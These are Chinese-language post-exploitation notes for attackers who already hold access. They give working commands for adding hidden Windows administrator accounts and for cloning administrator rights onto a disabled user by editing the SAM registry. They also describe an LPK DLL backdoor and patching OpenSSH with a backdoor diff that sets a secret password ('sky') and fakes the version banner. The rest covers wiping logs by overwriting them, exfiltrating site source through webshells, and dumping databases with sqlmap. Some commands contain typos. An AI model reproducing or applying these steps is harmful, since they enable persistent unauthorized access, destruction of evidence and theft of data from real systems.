后渗透
安装后门
windows后门安装
账号后门
- 基本
net user
net user a$ 123123 /add
net localgroup administrators /add
- 使用系统已有但被禁用的用户X
- 管理–本地用户与组–用户
- 找到符合要求的用户X
- 属性–终端配置文件–取消 “拒绝这个用户登录到任何终端服务器”
- 打开注册表
regedit
- 找到SAM,赋给administrator读取和完全控制权限
- 刷新打开SAM–Domains–Account–Users–Names
- 找到用户X,查看类型,找到对应的文件夹
- 找到administrator,查看类型
- 将administrator的类型 F 覆盖给用户X
- 返回SAM,收回权限
LPK后门
- 使用TOOLS Lpk Sethc工具
- 生成一个lpk.dll文件
- 上传到服务器启动目录
木马后门
- Melody
- 上兴
linux后门
查看当前版本的ssh信息
ssh -V
查找ssh的配置文件,一般在/etc/ssh中
备份原来的文件
- 将/etc/ssh下的文件备份,假设/etc/ssh/sshd_config 备份为/etc/ssh/sshd_config.old
wegt存在后门的ssh
- 正规文件:openssh-5.9p1.tar
- 后门文件:openssh-5.9p1.path.tar
tar zxf openssh-5.9p1.tar tar zxf openssh-5.9p1.path.tar cp openssh-5.9p1.path/sshbd5.9p1.diff /openssh-5.9p1 cd openssh-5.9p1 patch < sshbd5.9p1.diff
修改ssh信息
vi includes.h
##define SECRETPW "sky"
后门的密码vi version.h
#define SSH_VERSION "OpenSSH_5.8p1 Debian-1ubuntu3"
修改为第一步ssh -V查看到的信息#define SSH_PORTABLE "p1"
源码编译
yum install -y openssl openssl-devel pam-devel
./configure --prefix=/usr --sysconfidir=/etc/ssh --with-pam --with-kerberos5
make
make install
重启服务
service sshd restart
日志清除
windows系统日志清除
- 使用清除日志工具
linux系统日志清除
- 查看系统
- 找到系统日志/网站日志位置
- 写入空 如
cat /dev/null > /var/log/message
源码打包
asp源码打包
- 利用webshell
- asp+access
- asp+sqlserver
php源码打包
- 利用webshell
脱裤
数据库允许外部地址连接
- access脱裤(源码打包可下载)
- sqlserver脱裤
- mysql脱裤
- 使用工具进行连接脱裤,但是需要一定权限
数据库不允许外部地址连接
- 上传脱裤脚本
- sqlmap
- burp